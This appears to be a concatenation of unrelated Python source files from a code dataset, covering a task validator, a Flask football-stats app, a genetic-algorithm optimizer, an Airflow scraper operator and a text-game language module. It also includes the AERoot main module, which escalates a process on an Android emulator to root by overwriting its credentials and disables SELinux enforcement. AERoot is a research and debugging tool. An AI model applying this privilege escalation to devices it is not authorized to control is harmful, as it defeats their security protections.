            self.check_data_and_root(self.instance.project, data)
            return task

        # check task is dict
        if not isinstance(task, dict):
            raise ValidationError('Task root must be dict with "data", "meta", "annotations", "predictions" fields')

        # task[data] | task[annotations] | task[predictions] | task[meta]
        if self.check_allowed(task):
            # task[data]
            self.raise_if_wrong_class(task, 'data', (dict, list))
            self.check_data_and_root(self.project, task['data'])

            # task[annotations]: we can't use AnnotationSerializer for validation
            # because it's much different with validation we need here
            self.raise_if_wrong_class(task, 'annotations', list)
            for annotation in task.get('annotations', []):
                ok = 'result' in annotation
                if not ok:
                    raise ValidationError('Annotation must have "result" fields')
                # check result is list
                if not isinstance(annotation.get('result', []), list):
                    raise ValidationError('"result" field in annotation must be list')

            # task[predictions]
            self.raise_if_wrong_class(task, 'predictions', list)
            for prediction in task.get('predictions', []):
                ok = 'result' in prediction
                if not ok:
                    raise ValidationError('Prediction must have "result" fields')

            # task[meta]
            self.raise_if_wrong_class(task, 'meta', (dict, list))

        # task is data as is, validate task as data and move it to task['data']
        else:
            self.check_data_and_root(self.project, task, dict_is_root=True)
            task = {'data': task}

        return task

    @staticmethod
    def format_error(i, detail, item):
        """Render one item's ValidationError detail(s) as a user-facing string."""
        if len(detail) == 1:
            code = (str(detail[0].code + ' ')) if detail[0].code != "invalid" else ''
            return 'Error {code} at item {i}: {detail} :: {item}'\
                .format(code=code, i=i, detail=detail[0], item=item)
        else:
            errors = ', '.join(detail)
            codes = str([d.code for d in detail])
            return 'Errors {codes} at item {i}: {errors} :: {item}'\
                .format(codes=codes, i=i, errors=errors, item=item)

    def to_internal_value(self, data):
        """ Body of run_validation for all data items
        """
        if data is None:
            raise ValidationError('All tasks are empty (None)')
        if not isinstance(data, list):
            raise ValidationError('data is not a list')
        if len(data) == 0:
            raise ValidationError('data is empty')

        ret, errors = [], []
        self.annotation_count, self.prediction_count = 0, 0
        for i, item in enumerate(data):
            try:
                validated = self.validate(item)
            except ValidationError as exc:
                error = self.format_error(i, exc.detail, item)
                errors.append(error)
                # do not print to user too many errors
                if len(errors) >= 100:
                    errors[99] = '...'
                    break
            else:
                ret.append(validated)
                errors.append({})  # placeholder keeps errors aligned with items
                if 'annotations' in item:
                    self.annotation_count += len(item['annotations'])
                if 'predictions' in item:
                    self.prediction_count += len(item['predictions'])

        if any(errors):
            logger.warning('Can\'t deserialize tasks due to ' + str(errors))
            raise ValidationError(errors)

        return ret
return ret
def is_url(string):
    """Return True if *string* parses as an absolute URL (scheme and netloc).

    Leading/trailing whitespace is ignored. Fix vs. original: non-string
    input (e.g. None) used to raise an uncaught AttributeError from
    ``.strip()``; it now returns False like other invalid inputs.
    """
    try:
        result = urlparse(string.strip())
        return all([result.scheme, result.netloc])
    except (ValueError, AttributeError):
        return False
| StarcoderdataPython |
3576601 | """
AERoot main module
"""
from enum import IntEnum, auto
from aeroot.avd import Avd, AVDError, AmbiguousProcessNameError
class ProcessNotRunningError(Exception):
    """Raised when the targeted process is not running on the device."""
    pass

class AERootError(Exception):
    """Top-level error raised by the AERoot rooting workflow."""
    pass
class Mode(IntEnum):
    """How the target process is identified: by PID or by process name."""
    PID = auto()
    NAME = auto()
class AERoot:
    """Drives the rooting workflow against an Android emulator (AVD)."""

    def __init__(self, options):
        # options: parsed CLI options (device, host, port, mode, pid/process_name)
        self.options = options
        self.avd = None

    def do_root(self):
        """Resolve the target process and overwrite its credentials.

        Raises AERootError on any AVD failure or ambiguous process name;
        raises ProcessNotRunningError when name lookup yields no PID.
        """
        try:
            self.avd = Avd(self.options.device, self.options.host, self.options.port)
            if self.options.mode == Mode.NAME:
                self.options.pid = self.avd.get_pid(self.options.process_name)
                if self.options.pid is None:
                    raise ProcessNotRunningError
            self.avd.overwrite_credentials(self.options.pid)
            # Put SELinux in permissive mode (setenforce 0).
            self.avd.selinux_setenforce(0)
        except AVDError as err:
            raise AERootError(err)
        except AmbiguousProcessNameError:
            msg = (
                "Several processes with the same name are currently running",
                "You should use the pid to target the process"
            )
            raise AERootError("\n".join(msg))

    def cleanup(self):
        """Close the AVD connection if one was opened."""
        if self.avd is not None:
            self.avd.close()
| StarcoderdataPython |
3467284 | <gh_stars>0
from flask import Flask, render_template
from flask import request
from flask.ext import restful
from flask.ext.restful import reqparse
from tasks.League import League
from tasks.Fixture import Fixture
import csv
import os
app = Flask(__name__)
@app.route('/')
def index():
    # Render the empty selection form; the string 'NULL' acts as the
    # "nothing selected yet" sentinel throughout this app. (Python 2 file.)
    print request.url
    return render_template('index.html', country='NULL', season='NULL', homeTeam='NULL', awayTeam='NULL', homeTeamList=None, awayTeamList=None)
@app.route('/api/v1.0/league', methods=['GET'])
def getTask():
    """Render the league table once country/season/both teams are chosen."""
    if request.method == "GET":
        # NOTE(review): request.args.get returns None for a missing
        # parameter, and None != 'NULL' is True — a request without these
        # query params falls into the fully-selected branch. Confirm the
        # front end always sends 'NULL' placeholders.
        country = request.args.get('country')
        season = request.args.get('season')
        homeTeam = request.args.get('homeTeam')
        awayTeam = request.args.get('awayTeam')
        if country != 'NULL' and season != 'NULL' and homeTeam != 'NULL' and awayTeam != 'NULL':
            # Everything selected: compute and show the league table.
            teamList = getTeamList(country, season)
            htmlTable = processLeague(season, country, homeTeam, awayTeam)
            return render_template('league.html', country=country, season=season, homeTeam=homeTeam, awayTeam=awayTeam, homeTeamList=teamList, awayTeamList=teamList, htmlTable=htmlTable)
        elif country != 'NULL' and season != 'NULL' and (homeTeam == 'NULL' or awayTeam == 'NULL'):
            # Country + season chosen: populate the team dropdowns.
            teamList = getTeamList(country, season)
            return render_template('index.html', country=country, season=season, homeTeam=homeTeam, awayTeam=awayTeam, homeTeamList=teamList, awayTeamList=teamList)
        else:
            # Nothing (or only partial basics) selected: empty form again.
            return render_template('index.html', country=country, season=season, homeTeam='NULL', awayTeam='NULL', homeTeamList=None, awayTeamList=None)
def processLeague(season, country, homeTeam, awayTeam):
    """Build the HTML league table for the given country/season.

    homeTeam/awayTeam are accepted for interface compatibility with the
    route handler but are not used here. Fix vs. original: a getTeamList()
    call whose result was never used has been removed.
    """
    fixtureList = getFixtureList(country, season)
    league = League(country, season)
    league.addFixtures(fixtureList)
    return league.getHTMLTable()
def getTeamList(country, season):
    """Return the alphabetically sorted team names for a league season.

    Team names are read from the third CSV column (the home-team column) of
    ``data/<season-code>/<league-code>.csv``.  Returns None when the country
    or season is unknown, or when the data file does not exist.

    Fixes: the file handle is now closed (``with``), an unknown country or
    season no longer raises KeyError (it returns None, matching the
    missing-file contract), and deduplication uses a set instead of an
    O(n) ``not in list`` test per row.

    NOTE(review): only the home-team column is scanned; for a complete
    season every team appears at home at least once, but a partial file
    could miss away-only teams -- confirm whether column 3 (away team)
    should be included as well.
    """
    # Season label -> directory code used on disk (e.g. '2014-2015' -> '1514').
    seasonList = {
        '2015-2016': '1615',
        '2014-2015': '1514',
        '2013-2014': '1413',
        '2012-2013': '1312',
        '2011-2012': '1211',
        '2010-2011': '1110',
        '2009-2010': '1009',
        '2008-2009': '0908',
    }
    # Country -> football-data league code (file basename).
    countryList = {
        'Belgium': 'B1',
        'England': 'E0',
        'France': 'F1',
        'Holland': 'N1',
        'Germany': 'D1',
        'Greece': 'G1',
        'Italy': 'I1',
        'Spain': 'SP1',
        'Scotland': 'SC0',
        'Turkey': 'T1',
    }
    seasonPath = seasonList.get(season)
    countryPath = countryList.get(country)
    # Unknown selection used to raise KeyError; treat it like missing data.
    if seasonPath is None or countryPath is None:
        return None
    filePath = 'data/{0}/{1}.csv'.format(seasonPath, countryPath)
    if not os.path.exists(filePath):
        return None
    teams = set()
    with open(filePath, 'r') as inputFile:
        for index, line in enumerate(inputFile):
            if index > 0:  # skip the CSV header row
                teams.add(line.rstrip().split(',')[2])
    return sorted(teams)
def getFixtureList(country, season):
    """Parse every fixture row of ``data/<season-code>/<league-code>.csv``
    into a list of Fixture objects.

    Returns None when the country or season is unknown, or when the data
    file does not exist.

    Fixes: the file handle is now closed (``with``), the not-found path
    returns None explicitly instead of falling off the end of the function,
    and an unknown country/season no longer raises KeyError.
    """
    # Season label -> directory code used on disk (e.g. '2014-2015' -> '1514').
    seasonList = {
        '2015-2016': '1615',
        '2014-2015': '1514',
        '2013-2014': '1413',
        '2012-2013': '1312',
        '2011-2012': '1211',
        '2010-2011': '1110',
        '2009-2010': '1009',
        '2008-2009': '0908',
    }
    # Country -> football-data league code (file basename).
    countryList = {
        'Belgium': 'B1',
        'England': 'E0',
        'France': 'F1',
        'Holland': 'N1',
        'Germany': 'D1',
        'Greece': 'G1',
        'Italy': 'I1',
        'Spain': 'SP1',
        'Scotland': 'SC0',
        'Turkey': 'T1',
    }
    seasonPath = seasonList.get(season)
    countryPath = countryList.get(country)
    if seasonPath is None or countryPath is None:
        return None
    filePath = 'data/{0}/{1}.csv'.format(seasonPath, countryPath)
    if not os.path.exists(filePath):
        return None
    fixtureList = []
    with open(filePath, 'r') as inputFile:
        header = None
        for index, line in enumerate(inputFile):
            if index == 0:
                # First row is the column header; Fixture needs it to map fields.
                header = line.rstrip().split(',')
            else:
                fixtureList.append(Fixture(header, line.rstrip().split(',')))
    return fixtureList
if __name__ == '__main__':
    # Development server: reachable from other hosts, debug reloader on.
    app.run(host='0.0.0.0', port=5050, debug=True)
| StarcoderdataPython |
# Author: <NAME>
# Last modified: 5/12/2018

# CONFIG FOR SYSTEM DEVICES

# ARDUINO
# Serial device node the Arduino enumerates as on Linux (first ACM port).
arduino_serial_port = "/dev/ttyACM0"
# Serial line speed; must match the baud rate used by the Arduino sketch.
arduino_baud = 9600
# Serial read timeout; 0 typically means non-blocking reads in pyserial --
# confirm against the code that consumes this setting.
arduino_timeout = 0

# RPI CAMERA
# Capture resolution (width, height) in pixels for the Raspberry Pi camera.
camera_resolution = (720, 480)
| StarcoderdataPython |
# from test import create_app  # previous factory location, kept for reference
from app import create_app

# Module-level ``app`` is the WSGI entry point servers import (e.g. gunicorn).
app = create_app()
| StarcoderdataPython |
3462242 | from keras.models import model_from_json
import numpy as np
from PIL import Image, ImageFilter
import PIL.ImageOps
from collections import Counter
import argparse as ap
# Fix the NumPy random seed so runs are reproducible.
seed = 7
np.random.seed(seed)

# Parse the command line: -i/--image is the path of the image to classify.
# Fix: ``required`` takes a bool; the original passed the string "True"
# (which only worked because any non-empty string is truthy).
parser = ap.ArgumentParser()
parser.add_argument("-i", "--image", help="Path to Image", required=True)
args = vars(parser.parse_args())

# Load the model architecture from JSON and compile it for prediction.
# Fix: use a context manager so the file is closed even if reading raises.
with open('model.json', 'r') as json_file:
    loaded_model_json = json_file.read()
loaded_model = model_from_json(loaded_model_json)
loaded_model.compile(loss='categorical_crossentropy', optimizer='adam', metrics=['accuracy'])
# function to convert image to MNIST format
def imageprepare(argv):
img = Image.open(argv).convert('L')
width = float(img.size[0])
height = float(img.size[1])
new_image = Image.new('L', (28, 28), (255)) # creates white canvas of 28x28 pixels
if width > height:
# Width is bigger. Width becomes 20 pixels.
nheight = int(round((20.0 / width * height), 0))
if (nheight == 0): # rare case but minimum is 1 pixel
nheight = 1
# resize and sharpen
img = img.resize((20, nheight), Image.ANTIALIAS).filter(ImageFilter.SHARPEN)
wtop = int(round(((28 - nheight) / 2), 0)) # calculate horizontal position
new_image.paste(img, (4, wtop)) # paste resized image on white canvas
else:
# Height is bigger. Heigth becomes 20 pixels.
nwidth = int(round((20.0 / height * width), 0))
if (nwidth == 0): # rare case but minimum is 1 pixel
nwidth = 1
# resize and sharpen
img = img.resize((nwidth, 20), Image.ANTIALIAS).filter(ImageFilter.SHARPEN)
wleft = int(round(((28 - nwidth) / 2), 0)) # caculate vertical pozition
new_image.paste(img, (wleft, 4)) # paste resized image on white canvas
new_image = PIL.ImageOps.invert(new_image)
tv = list(new_image.getdata()) # get pixel values
pixels = np.array(tv).reshape(1,784)
return pixels
# load weights into new model
loaded_model.load_weights('model.h5')
print('Loaded model from disk')
# convert image to MNIST format
test = imageprepare(args['image'])
# normalize data from 0-255 to 0-1
test = test/255
# make and print prediction
prediction = loaded_model.predict_classes(test)
prediction = Counter(prediction).most_common(1)[0][0]
print ("Prediction is: ", prediction)
| StarcoderdataPython |
1773574 | <reponame>jpodivin/pystrand
import multiprocessing as mp
import uuid
from pystrand.populations import BasePopulation
from pystrand.selections import RouletteSelection, ElitismSelection, BaseSelection
from pystrand.mutations import BaseMutation, PointMutation
from pystrand.loggers.csv_logger import CsvLogger
from pystrand.loggers.details import RunDetails
class BaseOptimizer:
    """Base optimizer class.

    Evolves ``population`` by repeatedly evaluating fitness, selecting
    genomes, and applying mutation (and optionally crossover) until
    ``max_iterations`` is reached or an individual attains fitness 1.0.

    Parameters
    ----------
    fitness_function : BaseFunction
        provides mapping from genotype to a fitness value, [0, 1]
    max_iterations : int
        0 by default
    population : Population
        Seed population, can include known sub-optimal solutions.
    mutation_prob : float
        0.001 by default
    mutation_ops :
        Mutation operator to use on genotypes.
        Uses supplied mutation_prob. If None, defaults to PointMutation.
        None by default.
    crossover_prob : float
        0.0 by default, no crossover will take place
    selection_ops : str, BaseSelection, or list of either
        Selection operator(s) applied in order each generation;
        'roulette' by default.
    selected_fraction : float
        Fraction of the population each selection operator retains;
        0.1 by default.
    log_path : str or None
        If set, run statistics are written there as CSV; passing the
        keyword argument ``save_details`` additionally records run details.
    parallelize : bool
        Use multiprocessing to evaluate genomes in parallel?

    Raises
    ------
    TypeError
        If supplied wrong selection method type.
        If supplied mutation_op not subclassing BaseMutation.
    """
    def __init__(self,
                 population,
                 max_iterations=0,
                 fitness_function=None,
                 mutation_prob=0.001,
                 mutation_ops=None,
                 crossover_prob=0.0,
                 selection_ops='roulette',
                 selected_fraction=0.1,
                 log_path=None,
                 parallelize=False,
                 **kwargs):
        """For each element in list of selection methods we check the type.
        Only Selection and string are accepted, other types raise TypeError.
        The strings must be recognized as names of algorithms,
        any other string will result in ValueError.
        """
        self._optimizer_uuid = str(uuid.uuid1())
        self._fitness_function = fitness_function
        # Normalize mutation operators: accept a list, a single operator,
        # or nothing (fall back to PointMutation with mutation_prob).
        if mutation_ops:
            if isinstance(mutation_ops, list):
                self._mutation_ops = mutation_ops
            elif issubclass(type(mutation_ops), BaseMutation):
                self._mutation_ops = [mutation_ops]
            else:
                raise TypeError(
                    'Invalid mutation operator.',
                    type(mutation_ops))
        else:
            self._mutation_ops = [PointMutation(mutation_prob)]
        # Loggers are optional; both stay None when no log_path is given.
        if log_path:
            self.logger = CsvLogger(log_path=log_path)
            if kwargs.get('save_details'):
                self.details_logger = RunDetails(log_path=log_path)
            else:
                self.details_logger = None
        else:
            self.logger = None
            self.details_logger = None
        self._crossover_probability = crossover_prob
        self._selection_methods = []
        self._parallelize = parallelize
        self._population = population
        self._max_iterations = max_iterations
        # First we turn selection_ops into a list, in case it isn't one.
        if not isinstance(selection_ops, list):
            selection_ops = [selection_ops]
        for selection_method in selection_ops:
            if isinstance(selection_method, str):
                if selection_method == 'roulette':
                    self._selection_methods += [RouletteSelection(selected_fraction)]
                elif selection_method == 'elitism':
                    self._selection_methods += [ElitismSelection(selected_fraction)]
                else:
                    raise ValueError(
                        'Unknown selection algorithm name.',
                        selection_method)
            elif isinstance(selection_method, BaseSelection):
                self._selection_methods += [selection_method]
            else:
                raise TypeError(
                    'Invalid selection type.',
                    type(selection_method))

    def evaluate_individual(self, individual):
        """Return fitness value of the given individual.
        """
        return self._fitness_function(individual)

    def evaluate_population(self):
        """Apply set fitness function to every individual in _population
        in either sequential or parallel manner depending on value of
        the _parallelize attribute. And store result in the 'fitness' field.
        """
        evaluated_individuals = self._population.individuals

        if self._parallelize:
            with mp.Pool() as worker_pool:
                # .get(5): 5-second timeout for the whole batch; a stuck
                # fitness function surfaces as mp.TimeoutError in fit().
                result = worker_pool.map_async(
                    self._fitness_function,
                    evaluated_individuals['genotype']).get(5)
            evaluated_individuals['fitness'] = result
        else:
            evaluated_individuals['fitness'] = [
                self._fitness_function(individual)
                for individual
                in evaluated_individuals['genotype']]

        self._population.replace_individuals(evaluated_individuals)

    def select_genomes(self):
        """Create new population by sequentially applying selection operators
        in the order they were given to __init__.
        Expand the new population to match the original one.
        """
        # Start from an empty population with the same genome shape/values.
        new_population = BasePopulation(
            0,
            self._population.genome_shapes,
            self._population.gene_values)

        for selection_method in self._selection_methods:
            new_population.append_individuals(
                selection_method.select(self._population))

        # Refill to the original size so the population does not shrink.
        new_population.expand_population(
            self._population.population_size)

        self._population = new_population

    def fit(self, fitnes_function=None, verbose=1):
        """Main training loop.
        Return statistics of the run as dictionary of lists.

        Parameters
        ----------
        fitnes_function: BaseFunction
            Optional override of the fitness function given to __init__.
            NOTE(review): the parameter name is misspelled
            ('fitnes_function'); renaming would break keyword callers,
            so it is kept as-is here.
        verbose : int
            If not '0' outputs statistics using print every generation.
            Default is 1.
        """
        if fitnes_function:
            self._fitness_function = fitnes_function
        elif not self._fitness_function:
            raise RuntimeError("No fitness function supplied")

        run_id = uuid.uuid1()

        # Per-generation statistics, appended each iteration.
        history = {
            "iteration" : [],
            "max_fitness" : [],
            "min_fitness" : [],
            "fitness_avg" : [],
            "fitness_std" : []}

        iteration = 0

        while iteration < self._max_iterations:
            try:
                self.evaluate_population()
            except mp.TimeoutError as timeoutException:
                # Parallel evaluation hung; abandon the run but keep the
                # statistics collected so far.
                print(
                    "Population evaluation timed out, with exception {}.".format(
                        timeoutException))
                break

            history["iteration"].append(iteration)
            history["max_fitness"].append(self._population.max_fitness)
            history["min_fitness"].append(self._population.min_fitness)
            history["fitness_avg"].append(self._population.avg_fitness)
            history["fitness_std"].append(self._population.fitness_std)

            if verbose > 0:
                print(" // ".join(
                    [key + ": " + str(record[-1]) for key, record in history.items()]
                ))

            # Early stop once a perfect-fitness individual exists.
            if self._population.max_fitness == 1.0:
                break

            self.select_genomes()
            self._population.mutate_genotypes(mutation_ops=self._mutation_ops)
            if self._crossover_probability > 0.0:
                self._population.cross_genomes(
                    crossover_prob=self._crossover_probability)
            iteration += 1

        if self.logger:
            self.logger.save_history(history, run_id=run_id)
            if self.details_logger:
                self.details_logger.save_run_details(self)

        return history

    @property
    def population(self):
        """Return optimized population.
        """
        return self._population

    @property
    def optimizer_uuid(self):
        """Return uuid of the optimizer.
        """
        return self._optimizer_uuid
| StarcoderdataPython |
12844977 | <reponame>lucaspfigueiredo/elt-pipeline<filename>plugins/operators/vivareal_operator.py
import json
import logging
from hooks.vivareal_hook import VivarealHook
from airflow.utils.decorators import apply_defaults
from airflow.models.baseoperator import BaseOperator
from airflow.providers.amazon.aws.hooks.s3 import S3Hook
# Module-level logger; basicConfig is a no-op if logging was already configured.
logger = logging.getLogger(__name__)
logging.basicConfig(level=logging.INFO)
class VivarealOperator(BaseOperator):
    """Airflow operator: scrape Vivareal listings via VivarealHook and
    upload them to S3 as a comma-terminated JSON-lines file."""

    # Attributes Airflow renders with Jinja templating before execution.
    template_fields = [
        "s3_key",
        "s3_bucket_name"
    ]

    @apply_defaults
    def __init__(self, s3_key, s3_bucket_name, *args, **kwargs) -> None:
        """Store the S3 destination; remaining args go to BaseOperator."""
        super().__init__(*args, **kwargs)
        self.s3_key = s3_key
        self.s3_bucket_name = s3_bucket_name

    def execute(self, context):
        """Fetch listing blocks from the hook, write each listing as one
        JSON object per line to a local file, then upload it to S3.

        NOTE(review): the file written is comma-terminated JSON lines, not
        a single valid JSON document -- consumers must parse line by line.
        """
        hook = VivarealHook()
        s3_hook = S3Hook(aws_conn_id="s3_connection")

        logger.info(f"Getting data")
        with open("vivareal.json", "w") as fp:
            for blocks in hook.run():
                for ap in blocks:
                    json.dump(ap, fp, ensure_ascii=False)
                    fp.write(",\n")

        logger.info(f"Uploading object in S3 {self.s3_bucket_name}")
        s3_hook.load_file(
            filename=fp.name,
            key=self.s3_key,
            bucket_name=self.s3_bucket_name
        )
if __name__ == "__main__":
    # Ad-hoc smoke test of the operator outside Airflow.
    # Fixes: __init__ accepts s3_key/s3_bucket_name, not the nonexistent
    # ``file_path`` kwarg the original passed (which raised TypeError),
    # and execute() requires its ``context`` argument.
    # NOTE(review): Airflow's BaseOperator conventionally also requires a
    # task_id -- confirm against the installed Airflow version.
    operator = VivarealOperator(
        task_id="vivareal_to_s3",
        s3_key="vivareal.json",
        s3_bucket_name="my-bucket",
    )
    operator.execute(context={})
11253281 | <gh_stars>100-1000
# coding=utf-8
from migrate.versioning import api
from app.config import SQLALCHEMY_DATABASE_URI
from app.config import SQLALCHEMY_MIGRATE_REPO
from app import db
import os.path
if __name__ == '__main__':
    # Create all tables registered on the SQLAlchemy metadata.
    db.create_all()
    if not os.path.exists(SQLALCHEMY_MIGRATE_REPO):
        # First run: create the sqlalchemy-migrate repository and put the
        # database under version control (at version 0).
        api.create(SQLALCHEMY_MIGRATE_REPO, 'database repository')
        api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO)
    else:
        # Repository already exists: register the database at the
        # repository's current version.
        api.version_control(SQLALCHEMY_DATABASE_URI, SQLALCHEMY_MIGRATE_REPO, api.version(SQLALCHEMY_MIGRATE_REPO))
| StarcoderdataPython |
3510010 | """
This tool returns the R length subsequences of elements from the input iterable.
Combinations are emitted in lexicographic sorted order. So, if the input iterable is sorted, the combination tuples will be produced in sorted order.
"""
from itertools import combinations
# Read "S k" from stdin: the source string and the maximum subsequence length.
raw = input().split()
letters = ''.join(sorted(raw[0]))
limit = int(raw[1])

# Sorting the input first makes itertools.combinations emit its tuples in
# lexicographic order; print every combination of length 1..k.
for size in range(1, limit + 1):
    for combo in combinations(letters, size):
        print(''.join(combo))
| StarcoderdataPython |
6658544 | <reponame>twisted/imaginary
# -*- test-case-name: imaginary.test.test_language -*-
"""
Textual formatting for game objects.
"""
import types
from string import Formatter
import attr
from zope.interface import implements, implementer
from twisted.python.components import registerAdapter
from imaginary import iimaginary, iterutils, text as T
from imaginary.iimaginary import IConcept, IExit
class Gender(object):
    """
    Grammatical genders used by L{Noun} to choose pronoun declensions.

    Acts as a simple enumeration; compare against these class attributes.
    """
    MALE = 1
    FEMALE = 2
    NEUTER = 3
    INDETERMINATE = 4
class Noun(object):
    """
    This is a language wrapper around a Thing.

    It is separated into its own class for two reasons:

    - You should try to keep your game-logic self-contained and avoid
      polluting it with lots of constant strings, so that porting to new
      interfaces (text prototype -> isometric final implementation) is easy.
      It's easier to read the code that way and make changes to the logic even
      if you don't want to move to a different interface.

    - It would be nice if text games could be internationalized by separating
      the formatting logic from the game logic.  In an extreme case, it would
      be SUPER-COOL if people could be playing the same game in french and
      english on the same server, simply by changing a setting on their
      client.
    """
    def __init__(self, thing):
        self.thing = thing

    def shortName(self):
        """Return the thing's bare name wrapped as a concept."""
        return ExpressString(self.thing.name)

    def nounPhrase(self):
        """Return the name with an indefinite article, unless the
        name is proper (proper names take no article)."""
        if self.thing.proper:
            return self.shortName()
        return ExpressList([self.indefiniteArticle(), self.shortName()])

    def definiteNounPhrase(self):
        """Return the name with a definite article, unless the
        name is proper."""
        if self.thing.proper:
            return self.shortName()
        return ExpressList([self.definiteArticle(), self.shortName()])

    def indefiniteArticle(self):
        # XXX TODO FIXME: YTTRIUM
        # Naive a/an choice: looks only at the first letter, so words like
        # "hour" or "unicorn" get the wrong article.
        if self.thing.name[0].lower() in u'aeiou':
            return u'an '
        return u'a '

    def definiteArticle(self):
        return u'the '

    def _declension(self, male, female, indeterminate, neuter):
        """
        Produce a declension based on the grammatical gender of the wrapped
        L{Thing}.

        @param male: the male declension of the specified pronoun
        @type male: L{unicode}

        @param female: the female declension of the specified pronoun
        @type female: L{unicode}

        @param indeterminate: the indeterminate declension of the specified
            pronoun
        @type indeterminate: L{unicode}

        @param neuter: the neuter declension of the specified pronoun
        @type neuter: L{unicode}

        @return: one of the parameters
        @rtype: L{unicode}
        """
        # Unknown/NEUTER genders fall through to the neuter form via .get().
        return ExpressString({
            Gender.MALE: male,
            Gender.FEMALE: female,
            Gender.INDETERMINATE: indeterminate,
        }.get(self.thing.gender, neuter))

    def heShe(self):
        """
        Return the personal pronoun for the wrapped thing.
        """
        return self._declension(u'he', u'she', u'they', u'it')

    def himHer(self):
        """
        Return the objective pronoun for the wrapped thing.
        """
        return self._declension(u'him', u'her', u'them', u'it')

    def hisHer(self):
        """
        Return a possessive determiner for the wrapped thing.
        """
        return self._declension(u'his', u'her', u'their', u'its')

    def hisHers(self):
        """
        Return a substantival possessive pronoun for the wrapped thing.
        """
        return self._declension(u'his', u'hers', u'theirs', u'its')
def flattenWithoutColors(vt102):
    """Flatten a vt102 text structure to a plain string, discarding colors."""
    return T.flatten(vt102, useColors=False)
@implementer(iimaginary.IConcept)
class BaseExpress(object):
    """
    Base class for concept wrappers: holds the wrapped object and derives
    the plaintext rendering from the subclass's vt102 rendering.
    """
    def __init__(self, original):
        self.original = original

    def plaintext(self, observer):
        # Render via vt102, then strip color formatting.
        return flattenWithoutColors(self.vt102(observer))
@implementer(IConcept)
@attr.s
class Description(object):
    """
    A renderable description of a thing: its title, visible exits, prose
    description, and extra concept components contributed by powerups.
    """
    # Concept for the heading (usually the thing's short name).
    title = attr.ib()
    # Iterable of IExit providers visible from the target, or None.
    exits = attr.ib()
    # Prose description text; falsy means no description line.
    description = attr.ib()
    # Additional IConcept components rendered after the description.
    components = attr.ib()
    # The thing being described; used for exit-traversal checks.
    target = attr.ib(default=None)

    def plaintext(self, observer):
        return flattenWithoutColors(self.vt102(observer))

    def vt102(self, observer):
        # Heading: "[ title ]" in bold green.
        title = [T.bold, T.fg.green, u'[ ',
                 [T.fg.normal, IConcept(self.title).vt102(observer)],
                 u' ]\n']
        yield title
        # Only list exits this observer could actually attempt to traverse.
        exits = list(
            IConcept(exit.name).vt102(observer)
            for exit in (self.exits or ())
            if exit.shouldEvenAttemptTraversalFrom(self.target,
                                                   observer))
        if exits:
            # Exit line: "( north south ... )" in yellow.
            yield [
                T.bold, T.fg.green, u'( ', [
                    T.fg.normal, T.fg.yellow,
                    iterutils.interlace(
                        u' ', exits)],
                u' )', u'\n']
        if self.description:
            yield (T.fg.green, self.description, u'\n')
        if self.components:
            # Render non-empty components separated by newlines.
            yield iterutils.interlace(
                u"\n",
                filter(None,
                       (component.vt102(observer)
                        for component in self.components)))

    @classmethod
    def fromVisualization(cls, target, others):
        """
        Create a L{Description} from a L{Thing} and some L{Paths} visually
        related to that L{Thing}.

        @param target: The L{IThing} being described by this L{Description}.
        @type target: L{IThing}

        @param others: Paths to items that are visible as portions of the
            target.
        @type others: L{list} of L{Path <imaginary.idea.Path>}s.

        @return: A L{Description} comprising C{target} and C{others}.
        """
        exits = []
        for other in others:
            # All of others are paths that go through target so just
            # using targetAs won't accidentally include any exits that aren't
            # for the target room except for the bug mentioned below.
            #
            # TODO: This might show too many exits.  There might be exits to
            # rooms with exits to other rooms, they'll all show up as on some
            # path here as IExit targets.  Check the exit's source to make sure
            # it is target.
            anExit = other.targetAs(IExit)
            if anExit is not None:
                exits.append(anExit)
        exits.sort(key=lambda anExit: anExit.name)

        descriptionConcepts = []

        for pup in target.powerupsFor(iimaginary.IDescriptionContributor):
            descriptionConcepts.append(pup.contributeDescriptionFrom(others))

        def index(c):
            # Order components deterministically: known contributor types
            # first, in this preferred order, everything else afterwards.
            # https://github.com/twisted/imaginary/issues/63
            preferredOrder = [
                'ExpressCondition',
                'ExpressClothing',
            ]
            try:
                return preferredOrder.index(c.__class__.__name__)
            except ValueError:
                # Anything unrecognized goes after anything recognized.
                return len(preferredOrder)

        descriptionConcepts.sort(key=index)

        return cls(
            title=Noun(target).shortName(),
            exits=exits,
            description=target.description,
            components=descriptionConcepts,
            target=target,
        )
class ExpressNumber(BaseExpress):
    """Concept wrapper for numbers: renders as the decimal string."""
    implements(iimaginary.IConcept)

    def vt102(self, observer):
        return str(self.original)
class ExpressString(BaseExpress):
    """Concept wrapper for plain strings, with optional capitalization."""
    implements(iimaginary.IConcept)

    def __init__(self, original, capitalized=False):
        self.original = original
        # Whether vt102() should upper-case the first character.
        self._cap = capitalized

    def vt102(self, observer):
        if self._cap:
            return self.original[:1].upper() + self.original[1:]
        return self.original

    def capitalizeConcept(self):
        # Return a capitalized copy; this wrapper itself is unchanged.
        return ExpressString(self.original, True)
class ExpressList(BaseExpress):
    """Concept wrapper for sequences: renders each element in order."""
    implements(iimaginary.IConcept)

    def concepts(self, observer):
        # Adapt every element to IConcept.
        return map(iimaginary.IConcept, self.original)

    def vt102(self, observer):
        return [x.vt102(observer) for x in self.concepts(observer)]

    def capitalizeConcept(self):
        # A capitalized list is a Sentence (capitalizes its first element).
        return Sentence(self.original)
class Sentence(ExpressList):
    """An ExpressList rendered as a sentence: its first concept is
    capitalized, the rest are rendered unchanged."""

    def vt102(self, observer):
        rendered = []
        for position, concept in enumerate(self.concepts(observer)):
            if position == 0:
                concept = concept.capitalizeConcept()
            rendered.append(concept.vt102(observer))
        return rendered

    def capitalizeConcept(self):
        # Already a sentence; capitalizing again is a no-op.
        return self
# Adapt common built-in types to IConcept.  This is Python 2: int/long and
# str/unicode are distinct types, so both of each pair must be registered.
registerAdapter(ExpressNumber, int, iimaginary.IConcept)
registerAdapter(ExpressNumber, long, iimaginary.IConcept)
registerAdapter(ExpressString, str, iimaginary.IConcept)
registerAdapter(ExpressString, unicode, iimaginary.IConcept)
registerAdapter(ExpressList, list, iimaginary.IConcept)
registerAdapter(ExpressList, tuple, iimaginary.IConcept)
registerAdapter(ExpressList, types.GeneratorType, iimaginary.IConcept)
class ItemizedList(BaseExpress):
    """Concept that renders a list of concepts as prose: "a, b, and c"."""
    implements(iimaginary.IConcept)

    def __init__(self, listOfConcepts):
        self.listOfConcepts = list(listOfConcepts)

    def concepts(self, observer):
        return self.listOfConcepts

    def vt102(self, observer):
        # Interleave the concepts with commas/'and' and render the result.
